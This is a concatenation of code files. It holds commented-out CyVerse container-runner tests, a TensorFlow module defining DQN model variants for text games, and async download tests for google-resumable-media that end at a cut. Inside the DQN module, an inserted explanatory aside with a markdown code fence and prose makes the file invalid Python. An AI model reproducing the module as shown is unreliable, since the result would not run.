# image="docker://alpine:latest",
# command='ls $INPUT | tee $INPUT.$TAG.output',
# input={
# 'kind': 'directory',
# 'from': remote_path,
# },
# output={
# 'to': remote_path,
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []}
# },
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ],
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path_1, "w") as file1, open(local_input_file_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_input_file_path_1, remote_path, token)
# upload_file(local_input_file_path_2, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_path)
# with open(local_output_path) as file:
# lines = file.readlines()
# assert len(lines) == 2
# assert local_input_file_path_1.split('/')[-1] in lines[0]
# assert local_input_file_path_2.split('/')[-1] in lines[1]
# remove(local_output_path)
#
# # check file was pushed to store
# files = list_files(remote_path, token)
# assert join(remote_path, local_output_path.split('/')[-1]) in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_excludes(remote_base_path):
# local_output_path = testdir
# local_output_file_included = join(local_output_path, "included.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_excludes',
# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 1
# assert join(remote_path, 'included.output') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_directory_output_with_excludes(remote_base_path):
# local_output_path = testdir
# local_output_file_included = join(local_output_path, f"included.{message}.output")
# local_output_file_excluded = join(local_output_path, "excluded.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_directory_output_with_excludes',
# workdir=testdir,
# image="docker://alpine:latest",
# command='touch excluded.output included.$TAG.output',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []},
# 'exclude': {'patterns': [], 'names': [
# 'excluded.output'
# ]}
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_included)
# assert isfile(local_output_file_excluded)
# remove(local_output_file_included)
# remove(local_output_file_excluded)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert len(files) == 1
# assert join(remote_path, f"included.{message}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes(
#         remote_base_path):
#     local_output_path = testdir
#     local_output_file_included = join(local_output_path, "included.output")
#     local_output_file_excluded = join(local_output_path, "excluded.output")
#     remote_path = join(remote_base_path, "testCollection")
#     plan = RunOptions(
#         identifier='test_run_succeeds_with_no_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes',
#         workdir=testdir,
#         image="docker://alpine:latest",
#         command='touch excluded.output included.output',
#         output={
#             'to': join(remote_base_path, "testCollection"),
#             'from': '',
#             # upper-case pattern exercises the non-matching-case behavior named in the test
#             'include': {'patterns': ['OUTPUT'], 'names': []},
#             'exclude': {'patterns': [], 'names': [
#                 'excluded.output'
#             ]}
#         },
#         cyverse_token=token)
#
#     try:
#         # prep CyVerse collection
#         create_collection(remote_path, token)
#
#         # expect 1 container
#         Runner(TerrainStore(plan)).run(plan)
#
#         # check files were written locally
#         assert isfile(local_output_file_included)
#         assert isfile(local_output_file_excluded)
#         remove(local_output_file_included)
#         remove(local_output_file_excluded)
#
#         # check files were pushed to CyVerse
#         files = list_files(remote_path, token)
#         assert len(files) == 1
#         assert join(remote_path, 'included.output') in [file['path'] for file in files]
#     finally:
#         clear_dir(testdir)
#         delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes(
#         remote_base_path):
#     local_output_path = testdir
#     local_output_file_included = join(local_output_path, f"included.{message}.output")
#     local_output_file_excluded = join(local_output_path, "excluded.output")
#     remote_path = join(remote_base_path, "testCollection")
#     plan = RunOptions(
#         identifier='test_run_succeeds_with_params_and_no_input_and_directory_output_with_non_matching_case_pattern_and_excludes',
#         workdir=testdir,
#         image="docker://alpine:latest",
#         command='touch excluded.output included.$TAG.output',
#         output={
#             'to': join(remote_base_path, "testCollection"),
#             'from': '',
#             'include': {'patterns': ['OUTPUT'], 'names': []},
#             'exclude': {'patterns': [], 'names': [
#                 'excluded.output'
#             ]}
#         },
#         cyverse_token=token,
#         parameters=[
#             {
#                 'key': 'TAG',
#                 'value': message
#             },
#         ])
#
#     try:
#         # prep CyVerse collection
#         create_collection(remote_path, token)
#
#         # expect 1 container
#         Runner(TerrainStore(plan)).run(plan)
#
#         # check files were written locally
#         assert isfile(local_output_file_included)
#         assert isfile(local_output_file_excluded)
#         remove(local_output_file_included)
#         remove(local_output_file_excluded)
#
#         # check files were pushed to CyVerse
#         files = list_files(remote_path, token)
#         assert len(files) == 1
#         assert join(remote_path, f"included.{message}.output") in [file['path'] for file in files]
#     finally:
#         clear_dir(testdir)
#         delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_directory_output_with_already_existing_output(remote_base_path, file_name_1):
#     local_output_path = testdir
#     local_input_file_path_1 = join(testdir, file_name_1)
#     local_output_file_included = join(local_output_path, f"included.{message}.output")
#     local_output_file_excluded = join(local_output_path, "excluded.output")
#     remote_path = join(remote_base_path, "testCollection")
#     plan = RunOptions(
#         identifier='test_run_succeeds_with_params_and_no_input_and_directory_output_with_already_existing_output',
#         workdir=testdir,
#         image="docker://alpine:latest",
#         command='touch excluded.output included.$TAG.output',
#         output={
#             'to': join(remote_base_path, "testCollection"),
#             'from': '',
#             'include': {'patterns': ['output', file_name_1], 'names': []},
#             'exclude': {'patterns': [], 'names': [
#                 'excluded.output'
#             ]}
#         },
#         cyverse_token=token,
#         parameters=[
#             {
#                 'key': 'TAG',
#                 'value': message
#             },
#         ])
#
#     try:
#         # prep CyVerse collection
#         create_collection(remote_path, token)
#
#         # prep file
#         with open(local_input_file_path_1, "w") as file1:
#             file1.write('Hello, 1!')
#         upload_file(local_input_file_path_1, remote_path, token)
#
#         # expect 1 container
#         Runner(TerrainStore(plan)).run(plan)
#
#         # check files were written locally
#         assert isfile(local_output_file_included)
#         assert isfile(local_output_file_excluded)
#         remove(local_output_file_included)
#         remove(local_output_file_excluded)
#
#         # check files were pushed to CyVerse
#         files = list_files(remote_path, token)
#         assert len(files) == 2
#         assert join(remote_path, f"included.{message}.output") in [file['path'] for file in files]
#     finally:
#         clear_dir(testdir)
#         delete_collection(remote_path, token)
# --- python/deepdnd/dqn_model.py (yinxusen/dqn-zork, Apache-2.0) ---
"""
Copyright 2019 Xusen Yin
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections
import tensorflow as tf
import deepdnd.dqn_func as dqn


class TrainDQNModel(
        collections.namedtuple(
            'TrainModel',
            ('graph', 'model', 'q_actions',
             'src_', 'src_len_',
             'train_op', 'loss', 'action_idx_', 'expected_q_', 'b_weight_',
             'train_summary_op', 'abs_loss',
             'initializer'))):
    pass
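# Aside: the container classes above are plain ``collections.namedtuple``
# subclasses used only to bundle graph handles by name. A minimal,
# framework-free sketch of the same pattern (``ModelBundle`` and its fields
# are made up for illustration, not part of this module):

```python
import collections


class ModelBundle(
        collections.namedtuple("ModelBundle", ("graph", "loss", "train_op"))):
    """Immutable, named bundle of model handles."""
    pass


bundle = ModelBundle(graph="g", loss=0.5, train_op="op")
print(bundle.loss)                      # fields are attribute-accessible
print(bundle._replace(loss=0.1).loss)   # returns a new bundle; original unchanged
```

Because the tuple is immutable, a bundle can be shared across training and
evaluation code without risk of one side mutating the other's handles.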


class EvalDQNModel(
        collections.namedtuple(
            'EvalModel',
            ('graph', 'model',
             'q_actions', 'src_', 'src_len_',
             'initializer'))):
    pass


class BaseDQN(object):
    def __init__(self, hp, src_embeddings=None, is_infer=False):
        self.is_infer = is_infer
        self.hp = hp
        if src_embeddings is None:
            self.src_embeddings = tf.get_variable(
                name="src_embeddings", dtype=tf.float32,
                shape=[hp.vocab_size, hp.embedding_size])
        else:
            self.src_embeddings = src_embeddings
        self.global_step = tf.train.get_or_create_global_step()
        self.optimizer = tf.train.AdamOptimizer(self.hp.learning_rate)
        self.inputs = {
            "src": tf.placeholder(tf.int32, [None, None]),
            "src_len": tf.placeholder(tf.float32, [None]),
            "action_idx": tf.placeholder(tf.int32, [None]),
            "expected_q": tf.placeholder(tf.float32, [None]),
            "b_weight": tf.placeholder(tf.float32, [None])
        }

    def get_q_actions(self):
        raise NotImplementedError()

    def get_train_op(self, q_actions):
        raise NotImplementedError()


class LSTMEncoderDQN(BaseDQN):
    def __init__(self, hp, src_embeddings=None, is_infer=False):
        super(LSTMEncoderDQN, self).__init__(hp, src_embeddings, is_infer)

    def get_q_actions(self):
        inner_states = dqn.encoder_lstm(
            self.inputs["src"], self.inputs["src_len"], self.src_embeddings,
            self.hp.lstm_num_units, self.hp.lstm_num_layers)
        q_actions = dqn.decoder_dense_classification(
            inner_states[-1].c, self.hp.n_actions)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_1Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.n_actions, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


class CNNEncoderDQN(BaseDQN):
    def __init__(self, hp, src_embeddings=None, is_infer=False):
        super(CNNEncoderDQN, self).__init__(hp, src_embeddings, is_infer)
        self.filter_sizes = [3, 4, 5]
        self.num_filters = hp.num_conv_filters
        self.num_tokens = hp.num_tokens
        self.l2_loss = tf.constant(0.0)
        self.l2_reg_lambda = 0.5
        self.pos_embeddings = tf.get_variable(
            name="pos_embeddings", dtype=tf.float32,
            shape=[self.num_tokens, self.hp.embedding_size])

    def get_q_actions(self):
        inner_states = dqn.encoder_cnn(
            self.inputs["src"], self.src_embeddings, self.pos_embeddings,
            self.filter_sizes, self.num_filters, self.hp.embedding_size)
        q_actions = dqn.decoder_dense_classification(inner_states,
                                                     self.hp.n_actions)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_1Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.n_actions, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


class CNNEncoderMultiLayerDQN(BaseDQN):
    def __init__(self, hp, src_embeddings=None, is_infer=False):
        super(CNNEncoderMultiLayerDQN, self).__init__(
            hp, src_embeddings, is_infer)
        self.filter_size = 3
        self.num_layers = hp.num_layers
        self.num_tokens = hp.num_tokens
        self.pos_embeddings = tf.get_variable(
            name="pos_embeddings", dtype=tf.float32,
            shape=[self.num_tokens, self.hp.embedding_size])

    def get_q_actions(self):
        h_cnn = dqn.encoder_cnn_multilayers(
            self.inputs["src"], self.src_embeddings, self.pos_embeddings,
            self.num_layers, self.filter_size, self.hp.embedding_size)
        pooled = tf.reduce_max(h_cnn, axis=1)
        inner_states = tf.reshape(pooled, [-1, self.hp.embedding_size])
        q_actions = dqn.decoder_dense_classification(inner_states,
                                                     self.hp.n_actions)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_1Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.n_actions, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


class MultiChannelCNNEncoderDQN(CNNEncoderDQN):
    def __init__(self, hp, src_embeddings=None, is_infer=False):
        super(MultiChannelCNNEncoderDQN, self).__init__(
            hp, src_embeddings, is_infer)
        self.inputs = {
            "src": tf.placeholder(tf.int32, [None, None, None]),
            "src_len": tf.placeholder(tf.float32, [None, None]),
            "action_idx": tf.placeholder(tf.int32, [None]),
            "expected_q": tf.placeholder(tf.float32, [None]),
            "b_weight": tf.placeholder(tf.float32, [None])
        }

    def get_q_actions(self):
        inner_states = dqn.encoder_cnn_multichannels(
            self.inputs["src"], self.inputs["src_len"], self.src_embeddings,
            self.filter_sizes, self.num_filters, self.hp.embedding_size,
            self.hp.num_channels)
        q_actions = dqn.decoder_dense_classification(inner_states,
                                                     self.hp.n_actions)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_1Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.n_actions, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


def create_train_model(model_creator, hp):
    graph = tf.Graph()
    with graph.as_default():
        model = model_creator(hp)
        initializer = tf.global_variables_initializer
        inputs = model.inputs
        src_placeholder = inputs["src"]
        src_len_placeholder = inputs["src_len"]
        action_idx_placeholder = inputs["action_idx"]
        expected_q_placeholder = inputs["expected_q"]
        b_weight_placeholder = inputs["b_weight"]
        q_actions = model.get_q_actions()
        loss, train_op, abs_loss = model.get_train_op(q_actions)
        loss_summary = tf.summary.scalar("loss", loss)
        train_summary_op = tf.summary.merge([loss_summary])
    return TrainDQNModel(
        graph=graph, model=model, q_actions=q_actions,
        src_=src_placeholder,
        src_len_=src_len_placeholder,
        train_op=train_op, action_idx_=action_idx_placeholder,
        expected_q_=expected_q_placeholder,
        b_weight_=b_weight_placeholder,
        loss=loss,
        train_summary_op=train_summary_op,
        abs_loss=abs_loss,
        initializer=initializer)


def create_eval_model(model_creator, hp):
    graph = tf.Graph()
    with graph.as_default():
        model = model_creator(hp, is_infer=True)
        initializer = tf.global_variables_initializer
        inputs = model.inputs
        src_placeholder = inputs["src"]
        src_len_placeholder = inputs["src_len"]
        q_actions = model.get_q_actions()
    return EvalDQNModel(
        graph=graph, model=model,
        q_actions=q_actions,
        src_=src_placeholder,
        src_len_=src_len_placeholder,
        initializer=initializer)


class TrainDQNGenModel(
        collections.namedtuple(
            'TrainModel',
            ('graph', 'model', 'q_actions',
             'src_', 'src_len_',
             'train_op', 'loss', 'action_idx_', 'expected_q_',
             'action_len_', 'b_weight_',
             'train_summary_op', 'abs_loss',
             'initializer'))):
    pass


class EvalDQNGenModel(
        collections.namedtuple(
            'EvalModel',
            ('graph', 'model',
             'q_actions', 'src_', 'src_len_',
             'initializer'))):
    pass


class LSTMEncoderDecoderDQN(BaseDQN):
    def __init__(self, hp, src_embeddings=None, tgt_embeddings=None,
                 is_infer=False):
        super(LSTMEncoderDecoderDQN, self).__init__(
            hp, src_embeddings, is_infer)
        # redefine inputs, notice the shape of action_idx
        self.inputs = {
            "src": tf.placeholder(tf.int32, [None, None]),
            "src_len": tf.placeholder(tf.float32, [None]),
            "action_idx": tf.placeholder(tf.int32, [None, None]),
            "expected_q": tf.placeholder(tf.float32, [None]),
            "action_len": tf.placeholder(tf.int32, [None]),
            "b_weight": tf.placeholder(tf.float32, [None])
        }
        if tgt_embeddings is None:
            self.tgt_embeddings = tf.get_variable(
                name="tgt_embeddings", dtype=tf.float32,
                shape=[self.hp.tgt_vocab_size, self.hp.embedding_size])
        else:
            self.tgt_embeddings = tgt_embeddings

    def get_q_actions(self):
        inner_states = dqn.encoder_lstm(
            self.inputs["src"], self.inputs["src_len"], self.src_embeddings,
            self.hp.lstm_num_units, self.hp.lstm_num_layers)
        q_actions = dqn.decoder_fix_len_lstm(
            inner_states, self.hp.tgt_vocab_size, self.tgt_embeddings,
            self.hp.lstm_num_units, self.hp.lstm_num_layers,
            self.hp.tgt_sos_id, self.hp.tgt_eos_id, self.hp.max_action_len)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_2Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.tgt_vocab_size, self.inputs["action_len"],
            self.hp.max_action_len, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


class CNNEncoderDecoderDQN(CNNEncoderDQN):
    def __init__(
            self, hp, src_embeddings=None, tgt_embeddings=None, is_infer=False):
        super(CNNEncoderDecoderDQN, self).__init__(hp, src_embeddings, is_infer)
        self.inputs = {
            "src": tf.placeholder(tf.int32, [None, None]),
            "src_len": tf.placeholder(tf.float32, [None]),
            "action_idx": tf.placeholder(tf.int32, [None, None]),
            "expected_q": tf.placeholder(tf.float32, [None]),
            "action_len": tf.placeholder(tf.int32, [None]),
            "b_weight": tf.placeholder(tf.float32, [None])
        }
        if tgt_embeddings is None:
            self.tgt_embeddings = tf.get_variable(
                name="tgt_embeddings", dtype=tf.float32,
                shape=[self.hp.tgt_vocab_size, self.hp.embedding_size])
        else:
            self.tgt_embeddings = tgt_embeddings

    def get_q_actions(self):
        inner_states = dqn.encoder_cnn_block(
            self.inputs["src"], self.src_embeddings, self.pos_embeddings,
            self.filter_sizes, self.num_filters, self.hp.embedding_size)
        q_actions = dqn.decoder_fix_len_cnn(
            inner_states, self.tgt_embeddings, self.pos_embeddings,
            self.hp.tgt_vocab_size, self.hp.embedding_size,
            self.filter_sizes, self.num_filters, self.hp.tgt_sos_id,
            self.hp.max_action_len)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_2Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.tgt_vocab_size, self.inputs["action_len"],
            self.hp.max_action_len, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


class CNNEDMultiLayerDQN(BaseDQN):
    def __init__(
            self, hp, src_embeddings=None, tgt_embeddings=None, is_infer=False):
        super(CNNEDMultiLayerDQN, self).__init__(hp, src_embeddings, is_infer)
        self.filter_size = 3
        self.num_layers = hp.num_layers
        self.num_tokens = hp.num_tokens
        self.pos_embeddings = tf.get_variable(
            name="pos_embeddings", dtype=tf.float32,
            shape=[self.num_tokens, self.hp.embedding_size])
        self.inputs = {
            "src": tf.placeholder(tf.int32, [None, None]),
            "src_len": tf.placeholder(tf.float32, [None]),
            "action_idx": tf.placeholder(tf.int32, [None, None]),
            "expected_q": tf.placeholder(tf.float32, [None]),
            "action_len": tf.placeholder(tf.int32, [None]),
            "b_weight": tf.placeholder(tf.float32, [None])
        }
        if tgt_embeddings is None:
            self.tgt_embeddings = tf.get_variable(
                name="tgt_embeddings", dtype=tf.float32,
                shape=[self.hp.tgt_vocab_size, self.hp.embedding_size])
        else:
            self.tgt_embeddings = tgt_embeddings

    def get_q_actions(self):
        inner_states = dqn.encoder_cnn_multilayers(
            self.inputs["src"], self.src_embeddings, self.pos_embeddings,
            self.num_layers, self.filter_size, self.hp.embedding_size)
        q_actions = dqn.decoder_fix_len_cnn_multilayers(
            inner_states, self.tgt_embeddings, self.pos_embeddings,
            self.hp.tgt_vocab_size, self.hp.embedding_size,
            self.num_layers, self.filter_size, self.hp.tgt_sos_id,
            self.hp.max_action_len)
        return q_actions

    def get_train_op(self, q_actions):
        loss, abs_loss = dqn.l2_loss_2Daction(
            q_actions, self.inputs["action_idx"], self.inputs["expected_q"],
            self.hp.tgt_vocab_size, self.inputs["action_len"],
            self.hp.max_action_len, self.inputs["b_weight"])
        train_op = self.optimizer.minimize(loss, global_step=self.global_step)
        return loss, train_op, abs_loss


def create_train_gen_model(model_creator, hp):
    graph = tf.Graph()
    with graph.as_default():
        model = model_creator(hp)
        initializer = tf.global_variables_initializer
        inputs = model.inputs
        src_placeholder = inputs["src"]
        src_len_placeholder = inputs["src_len"]
        action_idx_placeholder = inputs["action_idx"]
        expected_q_placeholder = inputs["expected_q"]
        action_len_placeholder = inputs["action_len"]
        b_weight_placeholder = inputs["b_weight"]
        q_actions = model.get_q_actions()
        loss, train_op, abs_loss = model.get_train_op(q_actions)
        loss_summary = tf.summary.scalar("loss", loss)
        train_summary_op = tf.summary.merge([loss_summary])
    return TrainDQNGenModel(
        graph=graph, model=model, q_actions=q_actions,
        src_=src_placeholder,
        src_len_=src_len_placeholder,
        train_op=train_op, action_idx_=action_idx_placeholder,
        action_len_=action_len_placeholder,
        b_weight_=b_weight_placeholder,
        expected_q_=expected_q_placeholder, loss=loss,
        abs_loss=abs_loss,
        train_summary_op=train_summary_op,
        initializer=initializer)


def create_eval_gen_model(model_creator, hp):
    graph = tf.Graph()
    with graph.as_default():
        model = model_creator(hp, is_infer=True)
        initializer = tf.global_variables_initializer
        inputs = model.inputs
        src_placeholder = inputs["src"]
        src_len_placeholder = inputs["src_len"]
        q_actions = model.get_q_actions()
    return EvalDQNGenModel(
        graph=graph, model=model,
        q_actions=q_actions,
        src_=src_placeholder,
        src_len_=src_len_placeholder,
        initializer=initializer)
# --- tests_async/unit/requests/test_download.py (googleapis/google-resumable-media-python, Apache-2.0) ---
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.client
import io

import aiohttp
import mock
import pytest

from google.resumable_media import common
from google._async_resumable_media import _helpers
from google._async_resumable_media.requests import download as download_mod
from tests.unit.requests import test_download as sync_test


EXPECTED_TIMEOUT = aiohttp.ClientTimeout(
    total=None, connect=61, sock_read=60, sock_connect=None
)


class TestDownload(object):
    @pytest.mark.asyncio
    async def test__write_to_stream_no_hash_check(self):
        stream = io.BytesIO()
        download = download_mod.Download(sync_test.EXAMPLE_URL, stream=stream)
        chunk1 = b"right now, "
        chunk2 = b"but a little later"
        response = _mock_response(chunks=[chunk1, chunk2], headers={})
        ret_val = await download._write_to_stream(response)
        assert ret_val is None
        assert stream.getvalue() == chunk1 + chunk2

    @pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
    @pytest.mark.asyncio
    async def test__write_to_stream_with_hash_check_success(self, checksum):
        stream = io.BytesIO()
        download = download_mod.Download(
            sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
        )
        chunk1 = b"first chunk, count starting at 0. "
        chunk2 = b"second chunk, or chunk 1, which is better? "
        chunk3 = b"ordinals and numerals and stuff."
        header_value = "crc32c=qmNCyg==,md5=fPAJHnnoi/+NadyNxT2c2w=="
        headers = {_helpers._HASH_HEADER: header_value}
        response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
        ret_val = await download._write_to_stream(response)
        assert ret_val is None
        assert stream.getvalue() == chunk1 + chunk2 + chunk3

    @pytest.mark.parametrize("checksum", ["md5", "crc32c"])
    @pytest.mark.asyncio
    async def test__write_to_stream_with_hash_check_fail(self, checksum):
        stream = io.BytesIO()
        download = download_mod.Download(
            sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
        )
        chunk1 = b"first chunk, count starting at 0. "
        chunk2 = b"second chunk, or chunk 1, which is better? "
        chunk3 = b"ordinals and numerals and stuff."
        bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
        header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
        headers = {_helpers._HASH_HEADER: header_value}
        response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
        with pytest.raises(common.DataCorruption) as exc_info:
            await download._write_to_stream(response)
        assert not download.finished
        error = exc_info.value
        assert error.response is response
        assert len(error.args) == 1
        if checksum == "md5":
            good_checksum = "fPAJHnnoi/+NadyNxT2c2w=="
        else:
            good_checksum = "qmNCyg=="
        msg = download_mod._CHECKSUM_MISMATCH.format(
            sync_test.EXAMPLE_URL,
            bad_checksum,
            good_checksum,
            checksum_type=checksum.upper(),
        )
        assert error.args[0] == msg

    @pytest.mark.asyncio
    async def test__write_to_stream_with_invalid_checksum_type(self):
        BAD_CHECKSUM_TYPE = "badsum"
        stream = io.BytesIO()
        download = download_mod.Download(
            sync_test.EXAMPLE_URL, stream=stream, checksum=BAD_CHECKSUM_TYPE
        )
        chunk1 = b"first chunk, count starting at 0. "
        chunk2 = b"second chunk, or chunk 1, which is better? "
        chunk3 = b"ordinals and numerals and stuff."
        bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
        header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
        headers = {_helpers._HASH_HEADER: header_value}
        response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
        with pytest.raises(ValueError) as exc_info:
            await download._write_to_stream(response)
        assert not download.finished
        error = exc_info.value
        assert error.args[0] == "checksum must be ``'md5'``, ``'crc32c'`` or ``None``"

    async def _consume_helper(
        self,
        stream=None,
        end=65536,
        headers=None,
        chunks=(),
        response_headers=None,
        checksum="md5",
        timeout=None,
    ):
        download = download_mod.Download(
            sync_test.EXAMPLE_URL, stream=stream, end=end, headers=headers
        )
        transport = mock.AsyncMock(spec=["request"])
        mockResponse = _mock_response(chunks=chunks, headers=response_headers)
        transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
        assert not download.finished
        if timeout is not None:
            ret_val = await download.consume(transport, timeout=timeout)
        else:
            ret_val = await download.consume(transport)
        assert ret_val is transport.request.return_value
        called_kwargs = {
            "data": None,
            "headers": download._headers,
            "timeout": EXPECTED_TIMEOUT if timeout is None else timeout,
        }
        if chunks:
            assert stream is not None
            called_kwargs["stream"] = True
        transport.request.assert_called_once_with(
            "GET", sync_test.EXAMPLE_URL, **called_kwargs
        )
        range_bytes = "bytes={:d}-{:d}".format(0, end)
        assert download._headers["range"] == range_bytes
        assert download.finished
        return transport

    @pytest.mark.asyncio
    async def test_consume(self):
        await self._consume_helper()

    @pytest.mark.asyncio
    async def test_consume_with_custom_timeout(self):
        await self._consume_helper(timeout=14.7)

    @pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
    @pytest.mark.asyncio
    async def test_consume_with_stream(self, checksum):
        stream = io.BytesIO()
        chunks = (b"up down ", b"charlie ", b"brown")
        await self._consume_helper(stream=stream, chunks=chunks, checksum=checksum)
        assert stream.getvalue() == b"".join(chunks)

    @pytest.mark.parametrize("checksum", ["md5", "crc32c"])
    @pytest.mark.asyncio
    async def test_consume_with_stream_hash_check_success(self, checksum):
        stream = io.BytesIO()
        chunks = (b"up down ", b"charlie ", b"brown")
        header_value = "crc32c=UNIQxg==,md5=JvS1wjMvfbCXgEGeaJJLDQ=="
        headers = {_helpers._HASH_HEADER: header_value}
        await self._consume_helper(
            stream=stream, chunks=chunks, response_headers=headers, checksum=checksum
        )
        assert stream.getvalue() == b"".join(chunks)

    @pytest.mark.parametrize("checksum", ["md5", "crc32c"])
    @pytest.mark.asyncio
    async def test_consume_with_stream_hash_check_fail(self, checksum):
        stream = io.BytesIO()
        download = download_mod.Download(
            sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
        )
        chunks = (b"zero zero", b"niner tango")
        bad_checksum = "anVzdCBub3QgdGhpcyAxLA=="
        header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
        headers = {_helpers._HASH_HEADER: header_value}
        transport = mock.AsyncMock(spec=["request"])
        mockResponse = _mock_response(chunks=chunks, headers=headers)
        transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
        assert not download.finished
        with pytest.raises(common.DataCorruption) as exc_info:
            await download.consume(transport)
        assert stream.getvalue() == b"".join(chunks)
        assert download.finished
        assert download._headers == {}
        error = exc_info.value
        assert error.response is transport.request.return_value
        assert len(error.args) == 1
        if checksum == "md5":
            good_checksum = "1A/dxEpys717C6FH7FIWDw=="
        else:
            good_checksum = "GvNZlg=="
        msg = download_mod._CHECKSUM_MISMATCH.format(
            sync_test.EXAMPLE_URL,
            bad_checksum,
            good_checksum,
            checksum_type=checksum.upper(),
        )
        assert error.args[0] == msg
        # Check mocks.
        transport.request.assert_called_once_with(
            "GET",
            sync_test.EXAMPLE_URL,
            data=None,
            headers={},
            stream=True,
            timeout=EXPECTED_TIMEOUT,
        )

    @pytest.mark.asyncio
    async def test_consume_with_headers(self):
        headers = {}  # Empty headers
        end = 16383
        await self._consume_helper(end=end, headers=headers)
        range_bytes = "bytes={:d}-{:d}".format(0, end)
        # Make sure the headers have been modified.
        assert headers == {"range": range_bytes}


class TestRawDownload(object):
    @pytest.mark.asyncio
    async def test__write_to_stream_no_hash_check(self):
        stream = io.BytesIO()
